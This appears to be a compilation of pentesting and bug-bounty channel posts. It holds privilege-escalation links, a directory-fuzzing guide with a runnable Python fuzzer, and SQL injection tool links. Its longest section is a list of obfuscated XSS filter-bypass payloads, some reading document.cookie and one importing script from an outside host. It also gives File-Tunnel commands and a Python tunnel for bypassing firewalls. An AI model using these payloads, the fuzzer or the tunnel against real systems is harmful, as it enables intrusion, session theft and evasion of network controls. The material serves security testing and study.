Pentesting Collection
Privilege Escalation
- Blog: Windows Privilege Escalation (Collection)
- Blog: Linux Privilege Escalation (Collection)
- Blog: Privilege Escalation via fail2ban
- Github: GossiTheDog/SystemNightMare
- Github: PEASS-ng
- Blogpost: NFS PrivEsc
- Blogpost: Bypassing the default UAC manually
- Github: CLSIDs for JP
- Blogpost: Using PetitPotam to NTLM Relay to Domain Administrator
- Paper: Abusing Kerberos: Kerberoasting
- Github: Kerberoast
- Github: aclpwn.py
  - Can be used to perform DCSync attacks and abuse the DACL
Today, I successfully discovered multiple directory listings. Here’s a quick guide to help you do the same:
1. Select Your Target: Identify the target website you want to test.
2. Use Intruder: Use a tool like Burp Suite's Intruder to automate the requests.
3. Set Positions: Configure the payload position in your request, e.g., target.com/{wordlist}/.
4. Analyze Responses: Examine the status codes and response lengths to identify valid directories.
credit to respected owner.
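The four steps above as a runnable example (added here; not the poster's code and not Burp). It starts a local `http.server` over a constructed document root so it works offline, then fuzzes `base/<word>/` with a made-up wordlist and keeps the responses whose status code or length differ from the host's "not found" baseline. The baseline trick (request a random name first, then tolerate only the length difference a server would add by echoing the path) is this example's own addition; it is what filters soft-404 pages that answer 200 to everything.

```python
import functools, http.server, os, random, socketserver, string, tempfile, threading, urllib.error, urllib.request

# Ignore HTTP(S)_PROXY so the requests really go to the local test server.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def fetch(base, path):
    """GET <base>/<path>/ and return (status, body) without raising on 4xx/5xx."""
    try:
        with OPENER.open(f"{base}/{path}/", timeout=5) as r:
            return r.status, r.read()
    except urllib.error.HTTPError as e:
        return e.code, e.read()


def fuzz_dirs(base, wordlist):
    """Probe base/<word>/ for each word and keep responses that differ from the host's not-found baseline.

    Returns [(word, status, body_length, looks_like_listing)] for the candidates worth a manual look.
    """
    bogus = "".join(random.choices(string.ascii_lowercase, k=16))
    base_status, base_body = fetch(base, bogus)      # how this host answers a directory that cannot exist
    hits = []
    for word in wordlist:
        status, body = fetch(base, word)
        # Same status, and a length that differs by at most the path-length difference, is just the
        # baseline page echoing our word back (a soft 404), so it is not a hit.
        if status == base_status and abs(len(body) - len(base_body)) <= abs(len(word) - len(bogus)):
            continue
        listing = b"Directory listing for" in body or b"Index of" in body   # python http.server / Apache markers
        hits.append((word, status, len(body), listing))
    return hits


class QuietHandler(http.server.SimpleHTTPRequestHandler):
    def log_message(self, *args):    # keep the demo server silent
        pass


def demo():
    """Serve a constructed doc root: 'admin' has no index (so it lists), 'static' has one, 'backup'/'uploads' do not exist."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "admin"))
        os.makedirs(os.path.join(root, "static"))
        with open(os.path.join(root, "admin", "users.csv"), "w") as f:
            f.write("alice,admin\n")                 # constructed sample file inside the listable directory
        with open(os.path.join(root, "static", "index.html"), "w") as f:
            f.write("<html><body>hello</body></html>")
        handler = functools.partial(QuietHandler, directory=root)
        with socketserver.TCPServer(("127.0.0.1", 0), handler) as srv:
            threading.Thread(target=srv.serve_forever, daemon=True).start()
            base = "http://127.0.0.1:%d" % srv.server_address[1]
            hits = fuzz_dirs(base, ["admin", "static", "backup", "uploads"])
            srv.shutdown()
    return hits


if __name__ == "__main__":
    for word, status, length, listing in demo():
        print(f"{word:10} {status} {length:6} {'LISTING' if listing else ''}")
```

Against a real target, swap `base` and the wordlist (e.g. a SecLists directory list) and leave the baseline check in place: it is the same "compare status and length" step the post describes, automated.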
I got sick; I will be back tomorrow, and a new Bug Bounty program is coming tomorrow.
📚Web Application Penetration testing Study Plan
📝This study plan is based on milestones. So, check how much you can cover and close the checkboxes. The more you close, the better candidate you are for the job role. Also, I assume you have already checked and are comfortable with Common Security Skills study plan.
Just to make sure that everyone understands what you need to learn to be a pentester: it is altogether different from bug bounty, Red Team, etc., but to excel in any of those roles you should be good at pentesting. Knowing pentesting does not necessarily mean you can be a Red Teamer or bug bounty hunter, but a red teamer is surely very good at pentesting. Also, vulnerability assessment is not pentesting; however, VAPT is a common skill required for pentester jobs.
🔗https://github.com/jassics/security-study-plan/blob/main/web-pentest-study-plan.md
🔖#infosec #cybersecurity #hacking #pentesting #security
🚀Found a subdomain running on Symfony debug mode.
👾Tip: Use EOS (https://github.com/synacktiv/eos) to get PHP variables and a lot more.
#BugBounty #bugbountytips #vulnerability
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
11 Year old Article
Just Reported XSS at Hackerone
Payload used :
"%5c"><body%2fonload%3d%26lt%3b!--%26gt%3b%26%2310confirm(1)%3bprompt(%2fXSS%2f.source)>"%2c
$23Million Bounty
WazirX Hunt Down bounty program
https://wazirx.com/blog/wazirx-bounty-program/
🥪Some XSS Payloads 😅
XSS Payloads
javascripta:alert(xss)//
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
onpointerenter%3Dconfirm%281%29
<inpuT autofocus oNFocus="setTimeout(function() { /*/top'al'+'\u0065'+'rt'/*/ }, 5000);"></inpuT%3E;
"><img/src/onerror=.1|alert``
Set.constructoralert\x28document.domain\x29``
";alert('XSS');//
alert][0].call(this,1)
wp-json/wp/v2/
"><a href=javascript:alert(1)
<script>onerror=alert;throw'hacked';</script>
''"><script>(1)</script><iFrAme/src=jaVascRipt:prompt.valueOf()(1)+class=shetty></iFramE>
javascript:alert(document.cookie)
javascript://%0aalert(1)
"><script>alert(hello)</script>
<scri00pt0>eval[(1)]</sc00rip00t>
{{0[a='constructor'][a')()}}
{{$eval.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{[].pop.constructor('alert\u00281\u0029')()}}
<svg><script%20?>confirm(1)
<svg/onload=eval(atob('YWxlcnQoJ1hTUycp'))>
<svg%2Fonload%3Deval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKQ%3D%3D'))>
<a href="javascript:alert(1)">Click Here</a>
<svg+onload='<script'-alert(1)>
<ScRiPt>alert(document.domain)</ScRiPt>
<ScRiPt/random>alert(document.domain);</ScRiPt>
<src<ScRiPt/random>ipt>alert(document.domain);<src</ScRiPt>ipt>
<scr\x00ipt>alert(document.domain)<scr\x00ipt>
"><img src=x onerror=alert(document.domain)>
"><!--><svg/onload=alert(document.domain)>
<iframe%00src="	javascript:prompt(document.domain)	%00>
<img src=1 onerror=print()>
<script>alert(document.domain)</script>
"onmousemove=alert("XSS_BY_shetty") "
<svg<script> onmou<script>seover</script>="alert('xss')">hii</svg</script>>
<svg/onload=window["al"+"ert"]1337>
<Img Src=OnXSS OnError=confirm(1337)>
<Svg Only=1 OnLoad=confirm(document.domain)>
<svg onload=alert(document.cookie)>
<sVG/oNLY%3d1/*/On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<Img Src=//X55.is OnLoad%0C=import(Src)>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
"><IMg%20SrC=x%20onerror=prompt(xss)>
<Svg%20On%20Only=1%20Onload=alert(1)>"
">'><details/open/ontoggle=confirm('XSS')>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
';window/*aabb/['al'%2b'ert';//
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//'>
<sVg OnPointerEnter="location=javas+cript:ale+rt%2+81%2+9;//</div">
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=a
alert(origin)>
🔗 @bugbounty_tech 🔗
File-Tunnel
Tunnel TCP connections through a file. The program starts a TCP listener and, when a connection is received, writes the TCP data into a file. That same file is read by the counterpart program, which establishes a TCP connection to the target and forwards the data on; the reply travels back the same way through a second file. To avoid the shared files growing indefinitely, a file is purged whenever it gets larger than 10 MB.
Example 1 - Bypassing a firewall
You'd like to connect from Host A to Host B, but a firewall is in the way. Both hosts, however, can reach the same shared folder.
Host A:
ft.exe --tcp-listen 127.0.0.1:5000 --write "\\server\share\1.dat" --read "\\server\share\2.dat"
Host B:
ft.exe --read "\\server\share\1.dat" --tcp-connect 127.0.0.1:3389 --write "\\server\share\2.dat"
Example 2 - Tunnelling over an RDP session's redirected drive
Host A (RDP client; its C:\Temp is exposed to the remote session as \\tsclient\c\Temp):
ft.exe --tcp-listen 127.0.0.1:5000 --write "C:\Temp\1.dat" --read "C:\Temp\2.dat"
Host B (RDP server):
ft.exe --read "\\tsclient\c\Temp\1.dat" --tcp-connect 192.168.1.50:8888 --write "\\tsclient\c\Temp\2.dat"
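To make the mechanism concrete, here is a minimal Python re-implementation of the same idea (an added example written for this page, not File-Tunnel's own code). Each direction is a shared file of length-prefixed frames: the listen side writes what it receives from its client into 1.dat and reads 2.dat, the connect side does the reverse, and a writer purges its file once it passes a size threshold. The framing, the polling interval, the empty-frame close marker and the lossy purge are this demo's simplifications, not File-Tunnel's actual format; both sides run as threads against a local echo server standing in for the firewalled service.

```python
import contextlib, os, socket, struct, tempfile, threading, time

HDR = struct.Struct("!I")      # frame = 4-byte big-endian length + payload (framing chosen for this demo)
MAX_FILE = 10 * 1024 * 1024    # purge threshold, mirroring File-Tunnel's 10 MB
POLL = 0.02                    # seconds between polls of the shared file


class FileChannel:
    """One direction of the tunnel: frames appended to a shared file, consumed by the other side."""
    def __init__(self, path, max_size=MAX_FILE):
        self.path, self.max_size, self.offset = path, max_size, 0
        open(path, "ab").close()

    def write(self, data):
        # Purge once the file outgrows max_size; the reader sees it shrink and restarts at offset 0.
        # Demo simplification: frames the reader has not consumed yet are lost by the purge.
        if os.path.getsize(self.path) > self.max_size:
            open(self.path, "wb").close()
        with open(self.path, "ab") as f:
            f.write(HDR.pack(len(data)) + data)

    def read(self):
        """Next complete frame, b"" for the peer-closed marker, or None if nothing new yet."""
        size = os.path.getsize(self.path)
        if size < self.offset:                    # writer purged the file
            self.offset = 0
        if size < self.offset + HDR.size:
            return None
        with open(self.path, "rb") as f:
            f.seek(self.offset)
            (n,) = HDR.unpack(f.read(HDR.size))
            payload = f.read(n)
        if len(payload) < n:                      # writer is mid-append; retry later
            return None
        self.offset += HDR.size + n
        return payload


def pump(sock, outbound, inbound):
    """Relay socket bytes into `outbound` and `inbound` frames into the socket until either end closes."""
    done = threading.Event()

    def sock_to_file():
        with contextlib.suppress(OSError):
            while not done.is_set():
                data = sock.recv(4096)
                if not data:                      # our peer closed: pass that on as an empty frame
                    if not done.is_set():
                        outbound.write(b"")
                    break
                outbound.write(data)
        done.set()

    def file_to_sock():
        with contextlib.suppress(OSError):
            while not done.is_set():
                frame = inbound.read()
                if frame is None:
                    time.sleep(POLL)
                elif frame == b"":                # far side's peer closed
                    break
                else:
                    sock.sendall(frame)
        done.set()
        with contextlib.suppress(OSError):
            sock.shutdown(socket.SHUT_RDWR)       # unblocks sock_to_file's recv

    threads = [threading.Thread(target=fn, daemon=True) for fn in (sock_to_file, file_to_sock)]
    for t in threads: t.start()
    for t in threads: t.join()


def demo(message=b"ping through a file", max_size=MAX_FILE):
    """client -> listener -> 1.dat -> connector -> echo server -> 2.dat -> client; returns the echo."""
    with tempfile.TemporaryDirectory() as d:
        f1, f2 = os.path.join(d, "1.dat"), os.path.join(d, "2.dat")
        srv = socket.create_server(("127.0.0.1", 0))   # what --tcp-listen binds
        echo = socket.create_server(("127.0.0.1", 0))  # stands in for the service behind the firewall

        def listener():       # ft --tcp-listen ... --write 1.dat --read 2.dat
            conn, _ = srv.accept()
            with conn:
                pump(conn, FileChannel(f1, max_size), FileChannel(f2, max_size))

        def connector():      # ft --read 1.dat --tcp-connect target --write 2.dat
            inbound, outbound = FileChannel(f1, max_size), FileChannel(f2, max_size)
            while (first := inbound.read()) is None:  # dial the target only once the client sent something
                time.sleep(POLL)
            with socket.create_connection(echo.getsockname()) as sock:
                sock.sendall(first)
                pump(sock, outbound, inbound)

        def echo_once():
            conn, _ = echo.accept()
            with conn:
                while chunk := conn.recv(4096):
                    conn.sendall(chunk)

        threads = [threading.Thread(target=fn, daemon=True) for fn in (listener, connector, echo_once)]
        for t in threads: t.start()
        with socket.create_connection(srv.getsockname()) as client:
            client.settimeout(5)
            client.sendall(message)
            got = b""
            while len(got) < len(message) and (chunk := client.recv(4096)):
                got += chunk
        for t in threads: t.join(timeout=5)        # let both ends finish before the temp dir is removed
        for s in (srv, echo): s.close()
        return got
```

`demo()` pushes one message through 1.dat and gets the echo back through 2.dat; `demo(b"x" * 40, max_size=43)` sets the threshold just under one 40-byte frame so that the close marker triggers a purge of 1.dat, which the reader survives by resetting its offset. A real tunnel also needs a handshake for multiple connections and for frames not yet consumed at purge time, which this demo does not address.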
💉SQL Injection Vulnerability Scanner Tools
🔹SQLMap – Automatic SQL Injection And Database Takeover Tool
🔗https://github.com/sqlmapproject/sqlmap
🔹jSQL Injection – Java Tool For Automatic SQL Database Injection
🔗https://github.com/ron190/jsql-injection
🔹BBQSQL – A Blind SQL-Injection Exploitation Tool
🔗https://github.com/Neohapsis/bbqsql
🔹NoSQLMap – Automated NoSQL Database Pwnage
🔗 https://github.com/codingo/NoSQLMap
🔹Whitewidow – SQL Vulnerability Scanner
🔗https://www.kitploit.com/2017/05/whitewidow-sql-vulnerability-scanner.html
🔹DSSS – Damn Small SQLi Scanner
🔗https://github.com/stamparm/DSSS
🔹explo – Human And Machine Readable Web Vulnerability Testing Format
🔗https://github.com/dtag-dev-sec/explo
🔹Blind-Sql-Bitshifting – Blind SQL-Injection via Bitshifting
🔗https://github.com/awnumar/blind-sql-bitshifting
🔹Leviathan – Wide Range Mass Audit Toolkit
🔗https://github.com/leviathan-framework/leviathan
🔹Blisqy – Exploit Time-based blind-SQL-injection in HTTP-Headers (MySQL/MariaDB)
🔗https://github.com/JohnTroony/Blisqy
🔖#infosec #cybersecurity #hacking #pentesting #security